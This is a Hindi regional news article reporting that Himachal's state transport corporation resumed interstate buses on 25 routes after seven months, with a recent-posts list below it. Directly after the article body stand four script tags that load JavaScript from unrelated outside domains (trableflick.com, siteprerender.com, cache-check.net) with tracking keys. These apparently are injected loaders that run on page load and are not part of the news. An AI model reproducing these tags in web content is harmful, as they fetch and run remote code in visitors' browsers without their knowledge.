Categories: हिमाचल

7 माह बाद शुरू हुई इंटर स्टेट बसें, फ़िलहाल दिल्ली को छोड़कर 25 रूट पर शुरू हुई बसें

<p>सात महीने के लम्बे अंतराल के बाद हिमाचल प्रदेश में&nbsp; बुधवार को हिमाचल पथ परिवहन निगम की इंटर स्टेट बस सेवा शुरू हो गई है। पहले ही दिन राजधानी शिमला के आईएसबीटी बस स्टैंड पर बाहरी राज्य विशेषकर चंडीगढ़ जाने के लिये यात्रियों की भीड़ लगी रही और अधिकतर बसें 100 फ़ीसदी सवारियों के साथ शिमला से रवाना हुई।</p>

<p>इस पर आईएसबीटी बस अड्डे के नियंत्रण कक्ष प्रभारी ने बताया कि पहले चरण में आज चंडीगढ़ के लिये बसें चलायी जा रही हैं और बहुत जल्द पंजाब और हरिद्वार के लिये भी शिमला डिविज़न से बसों का संचालन किया शुरू कर दिया जायेगा। जैसे ही उन्हें उच्च अधिकारियों से पंजाब और हरिद्वार के लिये बसों के संचालन करने के आदेश प्राप्त होंगे वैसे ही वहां के लिये बसों का संचालन शुरू कर दिया जायेगा। उन्होंने कहा की प्रोटोकॉल के तहत ही&nbsp; बसों को चलाया जा रहा है।</p>

<p>वहीं, काफ़ी लम्बे अरसे के बाद बाहरी राज्यों के लिये बसों को हरी झंडी मिलने के बाद लोग भी ख़ासे उत्साहित दिखे और सरकार के इस फ़ैसले को सही करार दिया। गौर रहे कि पहले चरण में जहां 25 रूटों पर ट्रायल के तौर पर अंतरराज्यीय बस सेवाओं को बहाल किया गया है। पहले चरण में चंडीगढ़, पठानकोट, बद्दी, होशियारपुर, लुधियाना, अंबाला, हरिद्वार प्रमुख शहर है जहां के लिये बसें चलाई जा रही हैं।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1602668779899″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

रेणुका विधानसभा क्षेत्र को उप मुख्यमंत्री का तोहफा, 2.40 करोड़ के विकास कार्यों का शुभारंभ

नाहन। उप मुख्यमंत्री मुकेश अग्निहोत्री ने आज जिला सिरमौर के श्री रेणुका जी विधान सभा…

9 hours ago

जानें कौन सी योजना देगी 1% ब्याज पर 20 लाख का शिक्षा ऋण

  Shimla: डॉ. वाईएस परमार ऋण योजना को सुक्‍खू सरकार ने विस्‍तार दिया है। योजना…

10 hours ago

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

10 hours ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

11 hours ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

11 hours ago

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

12 hours ago